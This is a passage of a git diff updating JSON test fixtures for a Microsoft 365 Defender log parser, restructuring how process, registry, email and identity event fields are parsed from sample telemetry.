\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", "event": { "category": [ "process" @@ -13,70 +19,119 @@ "info" ] }, - "@timestamp": "2024-10-22T15:09:44.594155Z", + "@timestamp": "2024-11-08T14:38:51.907372Z", "action": { "properties": { - "InitiatingProcessLogonId": "0", - "LogonId": "0" + "AccountSid": "S-1-2-3", + "LogonId": "999", + "process": { + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Network Command Shell", + "VersionInfoInternalFileName": "processcommand.exe", + "VersionInfoOriginalFileName": "processcommand.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.1", + "parent": { + "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "FileSize": 145408, + "IntegrityLevel": "System", + "LogonId": "999", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows\u00ae installer", + "VersionInfoInternalFileName": "file", + "VersionInfoOriginalFileName": "file.exe", + "VersionInfoProductName": "Windows Installer - Unicode", + "VersionInfoProductVersion": "5.0.22621.3880" + } + } }, "type": "ProcessCreated" }, "file": { - "directory": "/usr/bin/ps", + "directory": "C:\\Windows\\processcommand.exe", "hash": { - "md5": "098f6bcd4621d373cade4e832627b4f6", - "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", - "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" }, - "name": "ps", - "size": 144632 + "name": "processcommand.exe", + "size": 82944 }, "host": { - "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", - "name": "computer.intranet.example" + "id": "123456789abcdef", + "name": "host.group.local" }, "microsoft": { "defender": { "report": { - "id": "67417" + "id": "17318" } } }, "process": { "args": [ - "--no-headers", - "-A", - "-o", - "comm,pid,pcpu,pmem,rss,etimes" + "HTTP", + "advfirewall", + "delete", + "embedded", + "firewall", + "incoming", + "name=\"program=description=", + "rule", + "server", + "traffic\"" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, - "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", + "name": "processcommand.exe", "parent": { - "pid": 0 + "args": [ + "-Embedding", + "ABCDEF0123456789", + "E", + "Global\\HOST0000" + ], + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "executable": "c:\\windows\\file.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "file.exe", + "pid": 10868, + "start": "2024-11-08T14:38:00.674494Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows" }, - "pid": 423627, - "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "pid": 4520, + "start": "2024-11-08T14:38:51.903048Z", + "working_directory": "C:\\Windows" }, "related": { "hash": [ - "098f6bcd4621d373cade4e832627b4f6", - "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", - "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" ], "user": [ - "root" + "syst\u00e8me" ] }, "user": { - "domain": "computer", - "name": "root" + "domain": "account domain", + "name": "syst\u00e8me" } } } \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json index 3fe0d2cf8..212f23549 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json @@ -16,17 +16,19 @@ "@timestamp": "2023-01-04T14:35:20.616193Z", "action": { "properties": { - "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", - "InitiatingProcessFileSize": 445440, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client", - "InitiatingProcessVersionInfoInternalFileName": "omadmclient", - "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193", - "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements" + "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements", + "process": { + "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", + "FileSize": 445440, + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Host Process for OMA-DM Client", + "VersionInfoInternalFileName": "omadmclient", + "VersionInfoOriginalFileName": "omadmclient.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.19041.2193" + } }, "type": "RegistryKeyDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index a04e0e8be..72f93da4e 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -16,7 +16,11 @@ "@timestamp": "2024-10-22T15:09:47.246794Z", "action": { "properties": { - "InitiatingProcessLogonId": "0" + "process": { + "parent": { + "LogonId": "0" + } + } }, "type": "ScriptContent" }, @@ -38,10 +42,9 @@ }, "process": { "parent": { - "pid": 0 - }, - "pid": 423638, - "start": "2024-10-22T15:09:47.165481Z" + "pid": 423638, + "start": "2024-10-22T15:09:47.165481Z" + } }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json index 294c92d60..5f3e9f9b1 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json @@ -17,16 +17,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json index f2ac938fb..122a2bc61 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json @@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json index 031a0b50a..57b4e7abc 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json index 7d110bb54..e45140956 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json index 0a0174b85..f1753e2d7 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json index de75ec66d..0948ffe48 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json @@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": 